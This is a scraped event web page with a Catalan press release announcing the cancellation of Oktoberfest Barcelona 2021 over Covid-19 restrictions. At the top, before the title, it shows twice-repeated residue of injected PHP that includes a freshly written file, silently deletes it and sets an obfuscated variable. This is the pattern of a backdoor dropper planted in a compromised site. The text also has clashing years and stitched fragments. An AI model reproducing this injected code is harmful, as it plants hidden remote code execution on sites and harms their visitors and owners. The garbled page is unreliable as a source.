');fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?>");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Oktoberfest Barcelona 2020 | Festa de la cervesa

Oktoberfest Barcelona - Cancel·lació edició 2021

Oktoberfest Barcelona - Cancel·lació edició 2021

Oktoberfest Barcelona - Cancel·lació edició 2021

OKTOBERFEST BARCELONA NO OBRIRÀ LES SEVES PORTES EL PRÒXIM OCTUBRE 2021

Els efectes del Covid-19, i les restriccions actuals i futures, obliguen a cancel·lar l'edició del 2021 de la Oktoberfest Barcelona, per seguretat i responsabilitat social davant la pandèmia.

Barcelona, 2 d'agosto 2021. Eventop Carpas, empresa organitzadora oficial de Oktoberfest Barcelona, com a acte de responsabilitat, precaució i sensibilització cap al context actual generat per l'estat de pandèmia pel Covid-19, així com pels efectes actuals i futurs previstos per les autoritats sanitàries i governamentals, ha decidit no obrir les portes, de la qual seria la seva IX edició, el pròxim 1 d'Octubre 2021.

L'organització responsable d'aquest esdeveniment popular, juntament amb el patrocinador oficial, Paulaner (pertanyent a Heineken Espanya), ha avaluat les necessitats logístiques, de producció i de servei a tenir en compte en la producció, muntatge i desenvolupament d'un esdeveniment amb les característiques i requeriments com les que té Oktoberfest Barcelona i ha pres la decisió de no organitzar aquest esdeveniment, referent a la ciutat comtal, per tres raons; la seguretat de tots els seus treballadors i assistents de l'esdeveniment, per les dificultats addicionals derivades dels protocols actius actuals en matèria de gestió i desenvolupament d'esdeveniments de gran format, per no poder garantir el nivell de qualitat i experiència durant l'esdeveniment sota les condicions i restriccions de seguretat actuals.

Encara així, ens alegra confirmar que ja s'està treballant en l'edició de 2021 que esperem, tant des de l'organització com des dels col·laboradors i patrocinadors habituals, poder realitzar l'any que ve, amb totes les garanties. Us animem a estar atents a les xarxes socials de l'esdeveniment i a la web oficial per a poder reservar el vostre espai en la pròxima edició. Us esperem!

Més informació:

• Email: comunicacion@oktoberfest-barcelona.es

• Web oficial Oktoberfest Barcelona>> https://www.oktoberfest-barcelona.es/

• Instagram: https://www.instagram.com/oktoberfestbcn/

• Facebook: https://www.facebook.com/oktoberfestbcn